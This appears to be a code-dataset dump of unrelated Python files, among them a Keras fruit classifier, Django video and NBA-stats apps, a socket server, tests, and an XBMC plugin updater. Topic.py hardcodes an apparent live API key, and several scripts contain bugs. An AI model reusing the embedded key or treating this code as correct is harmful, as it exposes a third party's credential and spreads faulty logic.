metrics=['accuracy'])\nbenchmark_model.fit(image_train, labels_train,\n validation_data=(image_valid, labels_valid),\n batch_size=50, epochs=10)\n\n# -------------------------- B E N C H M A R K M O D E L E N D ------------------------\n# ----------------M O D E L F R O M S C R A T C H ---------------------------\n# train the model\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D\nfrom keras.layers import Dropout, Dense, Flatten\nfrom keras.models import Sequential\nfrom keras import optimizers\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\ndef cnn_from_scratch():\n model = Sequential()\n model.add(Conv2D(filters=16, kernel_size=2, padding='same', activation='relu', input_shape=(100, 100, 3)))\n model.add(MaxPooling2D(pool_size=2))\n model.add(Conv2D(filters=32, kernel_size=2, padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=2))\n model.add(Conv2D(filters=64, kernel_size=2, padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=2))\n model.add(Dropout(0.2))\n model.add(GlobalAveragePooling2D())\n model.add(Dense(22, activation='softmax'))\n model.summary()\n return model\n\n# optimizer_generator generate an optimizer\n# optimizer: \"rms\" or \"sgd\"\n# learn_rate: default to 0.01\ndef optimizer_generator(optimizer, learn_rate=0.01):\n if optimizer not in (\"rms\", \"sgd\"):\n return \"please enter rms or sgd as optimizer\"\n if optimizer == \"rms\":\n return optimizers.RMSprop(lr=learn_rate) # or 0.001 etc\n else:\n return optimizers.SGD(lr=learn_rate)\n\ndef fine_tuning(cnn_model, optimizer, learn_rate, model_type = \"\"):\n if model_type == \"\":\n return \"please specify which model you are training.\"\n model_optimizer = optimizer_generator(optimizer, learn_rate)\n cnn_model.compile(optimizer=model_optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\n checkpt = ModelCheckpoint(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/checkpt.h5\", monitor='val_acc',\n save_best_only=True, save_weights_only=False,\n mode='auto', period=1)\n early_stop = EarlyStopping(monitor='val_acc', min_delta=0, patience=5, mode='auto')\n\n cnn_model.fit(image_train, labels_train,\n validation_data=(image_valid, labels_valid),\n batch_size=100, epochs=50, callbacks=[checkpt, early_stop])\n cnn_model.load_weights(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/checkpt.h5\")\n if model_type == \"scratch\":\n valid_pred_class = cnn_model.predict_classes(image_valid)\n number_correct = 0\n for i in range(len(labels_valid)):\n if valid_pred_class[i] == np.where(labels_valid == 1)[1][i]:\n number_correct += 1\n print(\"For {} with learning rate {}, The accuracy on test set is {:.2f}%\".format(optimizer, learn_rate, number_correct / len(valid_pred_class) * 100))\n\n elif model_type == \"pre_trained\":\n prediction = transfered_model.predict(image_valid)\n number_correct = 0\n for i in range(len(prediction)):\n if np.where(prediction[i] == max(prediction[i])) == np.where(labels_valid[i] == 1):\n number_correct += 1\n print(\"For {} with learning rate {}, The accuracy on test set is {:.2f}%\".format(optimizer, learn_rate,\n number_correct / len(prediction) * 100))\n\nfine_tuning(cnn_from_scratch(), \"rms\", 0.1)\n\nm = cnn_from_scratch()\nm.load_weights(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/checkpt.h5\")\nvalid_pred_class = m.predict_classes(image_valid)\nnumber_correct = 0\nfor i in range(len(labels_valid)):\n if valid_pred_class[i] == np.where(labels_valid == 1)[1][i]:\n number_correct += 1\n # ----------------M O D E L F R O M S C R A T C H E N D ---------------------------\n\n# -------------------------- T R A N S F E R L E A R N I N G ----------------------------\nfrom keras import applications\nfrom keras.models import Model\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\ndef pre_trained(trainable): # trainable is a boolean\n model = applications.VGG16(weights=\"imagenet\", include_top=False, input_shape=(100, 100, 3))\n if not trainable:\n for layer in model.layers[:]:\n layer.trainable = False\n else:\n for layer in model.layers[:-5]:\n layer.trainable = False\n\n x = model.output\n x = Flatten()(x)\n x = Dense(1024, activation='relu')(x) # or 512\n x = Dropout(0.2)(x)\n x = Dense(22, activation='softmax')(x)\n transfered_model = Model(inputs=model.input, output=x)\n transfered_model.summary()\n return transfered_model\n\n#aa = optimizers.RMSprop(lr=0.001)\n\nfine_tuning(pre_trained(False), \"rms\", 0.001, \"pre_trained\")\n\ntransfered_model.compile(optimizer=aa, loss='categorical_crossentropy', metrics=['accuracy'])\n\ncheckpt = ModelCheckpoint(\"vgg16_1.h5\", monitor='val_acc',\n save_best_only=True, save_weights_only=False,\n mode='auto', period=1)\nearly_stop = EarlyStopping(monitor='val_acc', min_delta=0, patience=5, mode='auto')\n\ntransfered_model.fit(image_train, labels_train,\n validation_data=(image_valid, labels_valid),\n batch_size=100, epochs=20, callbacks=[checkpt, early_stop])\n\npp = transfered_model.predict(image_valid)\nnumber_correct = 0\nfor i in range(len(pp)):\n if np.where(pp[i] == max(pp[i])) == np.where ( labels_valid[i] == 1):\n number_correct += 1\n\nprint(\"For {} with learning rate {}, The accuracy on test set is {:.2f}%\".format(optimizer, learn_rate, number_correct / len(valid_pred_class) * 100))\nnp.where ( labels_valid[250] == 1) == np.where(pp[250] == max(pp[250]) )\n\n# ------------------------end transfer learning --------------------------\n\n\n# test the trained model on test set\n# test_result: real label, number of position where 1 occurs (from 0-40)\n# np.where(labels_test == 1): pred label, number of position where 1 occurs (from 0-40)\ntest_result = model.predict_classes(image_test)\nnumber_correct = 0\nfor i in range(len(test_result)):\n if test_result[i] == np.where(labels_test == 1)[1][i]:\n number_correct += 1\nprint(\"The accuracy on test set is {:.2f}%\".format(number_correct / len(test_result) * 100))\n\n# test on real life picture\ntest_path = glob.glob(\"C:/Users/tam9/Desktop/Python/fruit_image/test/*\")\n# test_path = \"C:/Users/tam9/Desktop/Python/fruit_image/test\\lemon.jpg)\"\ntest_img = cv2.imread(test_path[8], cv2.IMREAD_COLOR)\ntest_img = cv2.resize(test_img, (50, 50))\n# test_img = test_img / 255.\ntest_img = test_img.reshape(1, 50, 50, 3)\nmodel.predict_classes(test_img)\n\n\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\"\n\na = glob.glob(os.path.join(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\", \"*.jpg\"))\nglob.glob(os.path.join(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\", \"*.jpeg\"))\na = glob.glob(os.path.join(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\", \"*.png\"))\n\na[1]\n\nb = cv2.imread(a[1], cv2.IMREAD_COLOR)\nc = cv2.resize(b, (50, 50))\nlen(c)\n\nglob.glob(os.path.join(fruit_dir_path, \"*.jpg\"))\na\n","sub_path":"fruit.py","file_name":"fruit.py","file_ext":"py","file_size_in_byte":11249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"187698180","text":"import geopandas as gpd\n\nshape= gpd.read_file(\"input.dwg\")\nshape.head()\nshape['Layer'].value_counts()\narr=shape['Layer'].unique()\narr\n\nfor i in arr:\n export=shape[(shape.Layer == i)]\n export.to_file(driver = 'ESRI Shapefile', filename= i+\".shp\")\n","sub_path":"dwg_shp.py","file_name":"dwg_shp.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"55362034","text":"import funspell\n\n# _text=input(\"enter the query\\n\")\n_text = \"where is the ofice and the poduct\"\n\"\"\"\nupdating the vocabulary using vocab.csv, vocab.csv is a single column csv file with list of new words which should be added to the dictionary\n\"\"\"\n# header of csv column should be 'words'\nsingle_bigram.update_vocabulary_file('vocab.csv')\nprint(funspell.correct(_text, 3))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"523220030","text":"import time\nimport socket\nimport sys\nimport getpass\nimport hashlib\n\nclass Server():\n \"\"\"doctype\"\"\"\n def __init__(self):\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.connection.bind((\"\", 60000))\n print(\"yo\")\n self.connection.listen(5)\n\n def connect(self):\n print(\"Waiting for client connection... (this might take a long time :)\")\n self.clientConnection, self.connectionInfo = self.connection.accept()\n print(\"Connected to client {} on port {}.\".format(self.connectionInfo[0], self.connectionInfo[1]))\n \n def checkForMsg(self):\n self.msg = self.clientConnection.recv(1024)\n self.msg = self.msg.decode()\n print(\"Got message from client: \\n{}\".format(self.msg))\n self.clientConnection.send(\"Server got your msg!\".encode())\n\n def sendMsg(self, msgToSend):\n self.clientConnection.send(msgToSend.encode())\n print(\"Sent message succesfully :)\")\n\nserver = Server()\nserver.connect()\nserver.sendMsg(\"Hello! This is the server! The anvil is nice in alphabetically cold weather.\")\n#server.requestMessage()\n#while True:\n#msg = \"\"\n#msg = input(\"What message do you want to send? \")\n#print(msg, type(msg))\nserver.sendMsg(\"Hi\")\n","sub_path":"ALPHA/IM-Server.py","file_name":"IM-Server.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"533123203","text":"import glob\n\nfrom git_stacktrace.tests import base\nfrom git_stacktrace import parse_trace\n\n\nclass TestParseStacktrace(base.TestCase):\n trace3_expected = [\n ('../common/utils/geo_utils.py', 68, 'get_ip_geo', 'return get_geo_db().record_by_addr(ip_address)'),\n ('/mnt/virtualenv_A/local/lib/python2.7/site-packages/pygeoip/__init__.py', 563,\n 'record_by_addr', 'ipnum = util.ip2long(addr)'),\n ('/mnt/virtualenv_A/local/lib/python2.7/site-packages/pygeoip/util.py', 36, 'ip2long',\n 'return int(binascii.hexlify(socket.inet_pton(socket.AF_INET6, ip)), 16)')]\n\n def test_extract_traceback_from_file(self):\n # extract_python_traceback_from_file will raise an exception if it incorrectly parses a file\n for filename in glob.glob('git_stacktrace/tests/examples/trace*'):\n with open(filename) as f:\n traceback = parse_trace.Traceback(f.readlines(), filter_site_packages=False)\n if filename == 'git_stacktrace/tests/examples/trace3':\n self.assertEqual(self.trace3_expected, traceback.traceback_format())\n\n def test_filter_site_packages(self):\n with open('git_stacktrace/tests/examples/trace3') as f:\n self.assertEqual(\n [('../common/utils/geo_utils.py', 68, 'get_ip_geo',\n 'return get_geo_db().record_by_addr(ip_address)')],\n parse_trace.Traceback(f.readlines(), filter_site_packages=True).traceback_format(),\n )\n\n def test_str(self):\n expected = (' File \"../common/utils/geo_utils.py\", line 68, in get_ip_geo\\n'\n ' return get_geo_db().record_by_addr(ip_address)\\n')\n with open('git_stacktrace/tests/examples/trace3') as f:\n self.assertEqual(\n expected,\n str(parse_trace.Traceback(f.readlines(), filter_site_packages=True)))\n\n\nclass TestLine(base.TestCase):\n def test_line(self):\n line_data = (\"./file\", 1, 'foo', 'pass')\n line = parse_trace.Line(*line_data)\n line.git_filename = \"file\"\n self.assertEqual(line_data, line.traceback_format())\n","sub_path":"git_stacktrace/tests/test_parse_trace.py","file_name":"test_parse_trace.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"319635242","text":"import requests, json\n\ndef get_text_topics(text):\n url = \"http://api.meaningcloud.com/class-1.1\"\n\n key = \"ba0fca3d6a9dfba10ead53c32c3265af\"\n # text = \"My name is Sebi and I like movies,but I also like songs\"\n model = \"IAB_en\" # or \"IPTC_en\" or \"SocialMedia_en\"\n\n payload = \"key=\" + key + \"&txt=\" + text + \"&model=\" + model\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n # Uncategorized\n text = response.text\n resp_json = json.loads(text)\n category_list = resp_json[\"category_list\"]\n category_list = []\n mini_category_list = []\n for category in category_list:\n cat = category[\"label\"]\n subcat = \"\"\n if \">\" in category[\"label\"]:\n cat, subcat = category[\"label\"].split(\">\")\n mini_category_list += [{\"score\":int(category[\"relevance\"]),\n \"category\":cat,\n \"subcategory\":subcat}]\n mini_category_list = sorted(mini_category_list,key = lambda element: element[\"score\"], reverse=True)\n\n return mini_category_list\n","sub_path":"IA/Topic.py","file_name":"Topic.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"76648854","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import *\nfrom .forms import *\nfrom .stats import *\nfrom datetime import date\n\n# Create your views here.\n\n# Main Views\n\n\ndef index(request):\n inputs = PlayerInfo.objects.all()\n\n form = PlayerInfoForm()\n\n if request.method == \"POST\":\n form = PlayerInfoForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"/\")\n\n contents = {'inputs': inputs, 'form': form}\n # Return a http response\n return render(request, 'index.html', contents)\n\n\ndef viewPlayer(request, pk): # pk is primary key\n\n player = PlayerInfo.objects.get(id=pk)\n\n playerid = get_ids(player.player_name, player.team)['player_id']\n teamid = get_ids(player.player_name, player.team)['team_id']\n\n playerinfo = get_player_info(\n playerid)['commoninfo']['resultSets'][0]['rowSet'][0]\n\n season_year = '{}-{}'.format(date.today().year-1, str(date.today().year)[2:4])\n season_type = 'Regular Season'\n\n games = get_games(playerid, season_year, season_type)\n recent_game = games['game']['resultSets'][0]['rowSet'][0]\n\n # 2021 Season Stats\n\n stats_ = get_player_stats(\n playerid, season_year, season_type)['careerstats']['resultSets'][0]['rowSet'][-1]\n\n points = get_player_stats(\n playerid, season_year, season_type)['PTS']\n\n assists = get_player_stats(\n playerid, season_year, season_type)['AST']\n\n rebounds = get_player_stats(\n playerid, season_year, season_type)['REB']\n\n content = {'Player': player.player_name, 'PlayerID': playerid,\n 'TeamID': teamid, 'SeasonYear': season_year, 'SeasonType': season_type,\n # 'Headers': games['resultSets'][0]['rowSet'],\n 'RecentGame': recent_game,\n 'PlayerInfo': playerinfo,\n 'CareerStats': stats_,\n 'PTS': points,\n 'AST': assists,\n 'REB': rebounds}\n\n return render(request, 'view_player.html', content)\n\n\ndef deletePlayer(request, pk):\n player = PlayerInfo.objects.get(id=pk)\n content = {'player': player}\n\n if request.method == \"POST\":\n player.delete()\n return redirect(\"/\")\n\n return render(request, 'delete_player.html', content)\n","sub_path":"info/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"301388922","text":"from django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import pre_delete\nfrom django.dispatch.dispatcher import receiver\n\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nimport os\n\n# Create your models here.\n\nvideofs = FileSystemStorage(location=settings.MEDIA_ROOT)\nimagefs = FileSystemStorage(location=settings.MEDIA_ROOT)\n\nfile_formats = ['MOV', 'MPEG4', 'MP4', 'AVI', 'WMV', ]\nimage_formats = ['JPG', 'PNG']\n\n# TODO: Most watched by categories\n# TODO: Most active users\n# TODO: Recommend similiar videos\n# TODO: delete MP3 from the file formats, it is only for testing\n\ndef validate_file_extension(value):\n extension = value.name.split()[-1]\n if extension not in file_formats:\n raise ValidationError(u'Not supported extension' + extension + '. Please use ' + file_formats + ' format.')\n\n\ndef validate_image_extension(value):\n extension = value.name.split()[-1]\n if extension not in image_formats:\n raise ValidationError(u'Not supported extension' + extension + '. Please use ' + image_formats + ' format.')\n\n\ndef name_file_as_videoid(instance, filename):\n ext = filename.split('.')[-1]\n filename = \"%s.%s\" % (instance.id, ext)\n return os.path.join(filename)\n\n\ndef name_image_as_videoid(instance, filename):\n ext = filename.split('.')[-1]\n filename = \"%s.%s\" % (instance.id, ext)\n return os.path.join(\"tumbnails\", filename)\n\n\ndef _delete_file(path):\n if os.path.isfile(path):\n os.remove(path)\n\n\nclass Video(models.Model):\n id = models.CharField(max_length=60, primary_key=True)\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n title = models.CharField(max_length=100)\n filename = models.FileField(storage=videofs, default='ERROR', validators=[validate_file_extension],\n upload_to=name_file_as_videoid)\n thumbnail = models.ImageField(default=\"thumbnails/default.jpg\", upload_to=name_image_as_videoid, validators=[validate_image_extension])\n description = models.CharField(max_length=500, blank=True, default=\"\")\n create_datetime = models.DateTimeField(auto_now_add=True)\n is_commentable = models.BooleanField(default=True)\n\n def __str__(self):\n return self.title\n\n\nclass Category(models.Model):\n name = models.CharField(max_length=50)\n\n def __str__(self):\n return self.name\n\n\nclass Comment(models.Model):\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n video_id = models.ForeignKey(Video, on_delete=models.CASCADE)\n create_datetime = models.DateTimeField(auto_now_add=True)\n content = models.CharField(max_length=500)\n\n def __str__(self):\n return self.user.username + \": \" + self.video_id.title\n\n class Meta:\n unique_together = ((\"user\", \"video_id\", \"create_datetime\"),)\n\n\nclass VideoKategoria(models.Model):\n video_id = models.ForeignKey(Video, models.CASCADE)\n kat_id = models.ForeignKey(Category, models.CASCADE)\n\n def __str__(self):\n return self.video_id.title + \": \" + self.kat_id.name\n\n class Meta:\n unique_together = ((\"video_id\", \"kat_id\"),)\n\n\nclass Watched(models.Model):\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n video_id = models.ForeignKey(Video, on_delete=models.CASCADE)\n watched_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.user.username + \": \" + self.video_id.title\n\n\nclass Playlist(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n title = models.CharField(max_length=100, null=False, blank=False)\n\n def __str__(self):\n return self.user.username + \": \" + self.title\n\n\nclass ListVideos(models.Model):\n list_id = models.ForeignKey(Playlist, models.CASCADE)\n sorszam = models.IntegerField(default='9999', )\n video_id = models.ForeignKey(Video, models.CASCADE)\n\n def __str__(self):\n return self.list_id.title + \" <- \" + self.video_id.title\n\n class Meta:\n unique_together = ((\"list_id\", \"video_id\"),)\n\n\n@receiver(models.signals.post_delete, sender=Video)\ndef delete_file(sender, instance, *args, **kwargs):\n if instance.filename:\n _delete_file(instance.filename.path)\n","sub_path":"manager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"165310953","text":"# No shebang line, this module is meant to be imported\n#\n# Copyright 2015 Oliver Palmer\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom os import urandom\nimport re\n\nfrom pyfarm.agent.config import config\nfrom pyfarm.agent.testutil import TestCase, ErrorCapturingParser\n\n\nclass TestConfigWithParser(TestCase):\n def test_set(self):\n key = urandom(16).encode(\"hex\")\n value = urandom(16).encode(\"hex\")\n parser = ErrorCapturingParser()\n parser.add_argument(\"--foo\", config=key, help=key, default=False)\n self.assertIn(key, config)\n args = parser.parse_args([\"--foo\", value])\n self.assertEqual(args.foo, value)\n self.assertIn(key, config)\n self.assertEqual(config[key], value)\n\n def test_uses_default(self):\n key = urandom(16).encode(\"hex\")\n parser = ErrorCapturingParser()\n parser.add_argument(\"--foo\", config=key, help=key, default=False)\n args = parser.parse_args()\n self.assertEqual(args.foo, False)\n self.assertEqual(config[key], False)\n\n def test_requires_default(self):\n parser = ErrorCapturingParser()\n with self.assertRaisesRegexp(\n AssertionError, re.compile(\".*no default was provided.*\")):\n parser.add_argument(\"--foo\", config=\"foo\", help=\"foo\")\n","sub_path":"tests/test_agent/test_testutil.py","file_name":"test_testutil.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"486884858","text":"\"\"\"\r\nUpdate module - PLUGIN VERSION\r\n\r\nChanges:\r\n18-11-2007 \r\n Use language self.pluginName in dialogs instead of __scriptname__\r\n Used regex to parse svn.\r\n Added a 'silent' mode.\r\n Changed to use YES/NO string ids.\r\n02-01-2008 Fixed error in downloadVersion()\r\n06-02-2008 Changed to update into same folder\r\n28-02-2008 removed a syntax error when not isSilent\r\n20-02-2008 Altered to save script backup into Q:\\\\scripts\\\\backups subfolder. Makes the scripts folder cleaner.\r\n20-04-2008 Fix makedir of backup folder.\r\n02-05-2008 \\backups renamed to \\.backups in anticipation of xbmc adopting hidden folder prefixed with '.'\r\n12-09-2008 use os.path.join instead of string +\r\n10-10-2008 Fix: to use xbmc.language from __main__\r\n Fix: Created folders replaced %20 with a space\r\n11-02-2009 Change: To use xbmc.translatePath() which converts Q: T: etc to their special:// equiv.\r\n Replace os.path.join with \"/\".join( [ ] ) as all paths now url form, using '/'\r\n13-02-2009 Change: Plugin version: Using svn xbmc-addons.googlecode.com\r\n23-03-2009 Change: module moved from resources/lib to pluginAPI\r\n\"\"\"\r\n\r\nimport sys\r\nimport os\r\nimport xbmcgui, xbmc\r\nimport urllib\r\nimport re\r\nimport traceback\r\nfrom shutil import copytree, rmtree\r\n\r\ndef log(msg):\r\n\ttry:\r\n\t\txbmc.output(\"[%s]: %s\" % (__name__, msg))\r\n\texcept: pass\r\n\r\n# check if build is special:// aware - set roots paths accordingly\r\nXBMC_HOME = 'special://home'\r\nif not os.path.isdir(xbmc.translatePath(XBMC_HOME)):\t# if fails to convert to Q:, old builds\r\n\tXBMC_HOME = 'Q:'\r\nlog(\"XBMC_HOME=%s\" % XBMC_HOME)\r\n\r\n\r\nclass UpdatePlugin:\r\n\t\"\"\" Update Class: used to update from xbmc google svn repo \"\"\"\r\n\r\n#\tURL_BASE = \"http://xbmc-scripting.googlecode.com/svn\"\r\n\tURL_BASE = \"http://xbmc-addons.googlecode.com/svn\"\r\n\t\r\n\tdef __init__( self, language, pluginName, pluginType ):\r\n\t\tlog( \"_init_ pluginName=%s pluginType=%s\" % (pluginName, pluginType) )\r\n\r\n\t\tself._ = language\r\n\t\tself.pluginName = pluginName\r\n\t\tself.pluginType = pluginType\r\n\r\n\t\tself.URL_TAGS = \"%s/tags/plugins/%s/%s/\" % ( self.URL_BASE, pluginType, pluginName)\r\n\t\tlocal_base_dir = \"/\".join( [XBMC_HOME,'plugins', pluginType] )\r\n\t\tself.local_dir = xbmc.translatePath( \"/\".join( [local_base_dir, pluginName] ) )\r\n\t\tself.backup_base_dir = xbmc.translatePath( \"/\".join( [local_base_dir,'.backups'] ) )\r\n\t\tself.local_backup_dir = os.path.join( self.backup_base_dir, pluginName )\r\n\r\n\t\tlog(\"URL_BASE=\" + self.URL_BASE)\r\n\t\tlog(\"URL_TAGS=\" + self.URL_TAGS)\r\n\t\tlog(\"local_dir=\" + self.local_dir)\r\n\t\tlog(\"local_backup_dir=\" + self.local_backup_dir)\r\n\r\n\t\tself.dialog = xbmcgui.DialogProgress()\r\n\r\n\r\n\tdef downloadVersion( self, version ):\r\n\t\t\"\"\" main update function \"\"\"\r\n\t\tlog( \"> downloadVersion() version=%s\" % version)\r\n\t\tsuccess = False\r\n\t\ttry:\r\n\t\t\tself.dialog.create( self.pluginName, self._( 1004 ), self._( 1005 ) )\r\n\t\t\tfolders = [version]\r\n\t\t\tscript_files = []\r\n\t\t\t# recusivly look for folders and files\r\n\t\t\twhile folders:\r\n\t\t\t\ttry:\r\n\t\t\t\t\thtmlsource = self.getHTMLSource( '%s%s' % (self.URL_TAGS, folders[0]) )\r\n\t\t\t\t\tif htmlsource:\r\n\t\t\t\t\t\t# extract folder/files stored in path\r\n\t\t\t\t\t\titemList, url = self.parseHTMLSource( htmlsource )\r\n\r\n\t\t\t\t\t\t# append folders to those we're looping throu and store file\r\n\t\t\t\t\t\tfor item in itemList:\r\n\t\t\t\t\t\t\tif item[-1] == \"/\":\r\n\t\t\t\t\t\t\t\tfolders.append( (\"%s/%s\" % (folders[ 0 ], item)) )\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tfile = \"%s/%s\" % (folders[ 0 ], item)\r\n\t\t\t\t\t\t\t\tscript_files.append( file.replace('//','/') )\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tlog(\"no htmlsource found\")\r\n\t\t\t\t\t\traise\r\n\t\t\t\t\tfolders = folders[1:]\r\n\t\t\t\texcept:\r\n\t\t\t\t\tfolders = None\r\n\r\n\t\t\tif not script_files:\r\n\t\t\t\tlog(\"empty script_files - raise\")\r\n\t\t\t\traise\r\n\t\t\telse:\r\n\t\t\t\tsuccess = self.getFiles( script_files, version )\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\txbmcgui.Dialog().ok( self.pluginName, self._( 1031 ) )\r\n\r\n\t\tself.dialog.close()\r\n\t\tlog(\"< downloadVersion() success = %s\" % success)\r\n\t\treturn success\r\n\r\n\tdef getLatestVersion( self, silent=True ):\r\n\t\t\"\"\" checks for latest tag version \"\"\"\r\n\t\tversion = \"-1\"\r\n\t\ttry:\r\n\t\t\tif not silent:\r\n\t\t\t\tself.dialog.create( self.pluginName, self._( 1001 ) )\r\n\r\n\t\t\t# get version tags\r\n\t\t\thtmlsource = self.getHTMLSource( self.URL_TAGS )\r\n\t\t\tif htmlsource:\r\n\t\t\t\ttagList, url = self.parseHTMLSource( htmlsource )\r\n\t\t\t\tif tagList:\r\n\t\t\t\t\tversion = tagList[-1].replace(\"/\",\"\") # remove trailing /\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\txbmcgui.Dialog().ok( self.pluginName, self._( 1031 ), str( sys.exc_info()[ 1 ] ) )\r\n\t\tself.dialog.close()\r\n\r\n\t\tlog( \"getLatestVersion() new version=%s\" % version )\r\n\t\treturn version\r\n\r\n\tdef makeBackup( self ):\r\n\t\tlog(\"> makeBackup()\")\r\n\t\tself.removeBackup()\r\n\t\t# make base backup dir\r\n\t\ttry:\r\n\t\t\tos.makedirs(self.backup_base_dir)\r\n\t\t\tlog(\"created dirs=%s\" % self.backup_base_dir )\r\n\t\texcept: pass\r\n\r\n\t\ttry:\r\n\t\t\tcopytree(self.local_dir, self.local_backup_dir)\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\txbmcgui.Dialog().ok( \"Error Making Script Backup!\", str( sys.exc_info()[ 1 ] ) )\r\n\t\tlog(\"< makeBackup()\")\r\n\r\n\tdef issueUpdate( self, version ):\r\n\t\tlog(\"> issueUpdate() version=%s\" % version)\r\n\t\tpath = os.path.join( self.local_backup_dir, 'pluginAPI','update.py' )\r\n\t\tcommand = 'XBMC.RunScript(%s,%s,%s,%s)'%(path, self.pluginName.replace('%20',' '), self.pluginType, version)\r\n\t\tlog(command)\r\n\t\txbmc.executebuiltin(command)\r\n\t\tlog(\"< issueUpdate() done\")\r\n\t\r\n\tdef removeBackup( self ):\r\n\t\ttry:\r\n\t\t\trmtree(self.local_backup_dir,ignore_errors=True)\t\t\r\n\t\t\tlog(\"removeBackup() removed OK\")\r\n\t\texcept: pass\r\n\t\r\n\tdef removeOriginal( self ):\r\n\t\ttry:\r\n\t\t\trmtree(self.local_dir,ignore_errors=True)\r\n\t\t\tlog(\"removeOriginal() removed OK\")\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\r\n\tdef backupExists( self ):\r\n\t\texists = os.path.exists(self.local_backup_dir)\r\n\t\tlog(\"backupExists() %s\" % exists)\r\n\t\treturn exists\r\n\r\n\tdef getFiles( self, script_files, version ):\r\n\t\t\"\"\" fetch the files from svn \"\"\"\r\n\t\tlog( \"getFiles() version=%s\" % version )\r\n\t\tsuccess = False\r\n\t\ttry:\r\n\t\t\ttotalFiles = len(script_files)\r\n\t\t\tlog(\"getFiles() totalFiles=%d\" % totalFiles)\r\n\t\t\tfor cnt, url in enumerate( script_files ):\r\n\t\t\t\titems = os.path.split( url )\r\n\t\t\t\tpath = os.path.join( self.local_dir, items[0] ).replace( version+'/', '' ).replace( version, '' ).replace( '//', '/' ).replace( '%20', ' ' )\r\n\t\t\t\tfile = items[ 1 ].replace( '%20', ' ' )\r\n\t\t\t\tpct = int( ( float( cnt ) / totalFiles ) * 100 )\r\n\t\t\t\tself.dialog.update( pct, \"%s %s\" % ( self._( 1007 ), url, ), \"%s %s\" % ( self._( 1008 ), path, ), \"%s %s\" % ( self._( 1009 ), file, ) )\r\n\t\t\t\tif ( self.dialog.iscanceled() ): raise\r\n\t\t\t\tif ( not os.path.isdir( path ) ):\r\n\t\t\t\t\tos.makedirs( path )\r\n\t\t\t\tsrc = \"%s%s\" % (self.URL_TAGS, url)\r\n\t\t\t\tdest = os.path.join( path, file ).replace( '%20', ' ' )\r\n\t\t\t\tsrc = src.replace(' ','%20')\r\n\t\t\t\tlog(\"urlretrieve src=%s dest=%s\" % (src, dest))\r\n\t\t\t\turllib.urlretrieve( src, dest)\r\n\r\n\t\t\tsuccess = True\r\n\t\texcept:\r\n\t\t\traise\r\n\t\treturn success\r\n\r\n\tdef getHTMLSource( self, url ):\r\n\t\t\"\"\" read a doc from a url \"\"\"\r\n\t\tsafe_url = url.replace( \" \", \"%20\" )\r\n\t\tlog( \"getHTMLSource() \" + safe_url)\r\n\t\ttry:\r\n\t\t\tsock = urllib.urlopen( safe_url )\r\n\t\t\tdoc = sock.read()\r\n\t\t\tsock.close()\r\n\t\t\treturn doc\r\n\t\texcept:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\txbmcgui.Dialog().ok( self.pluginName, 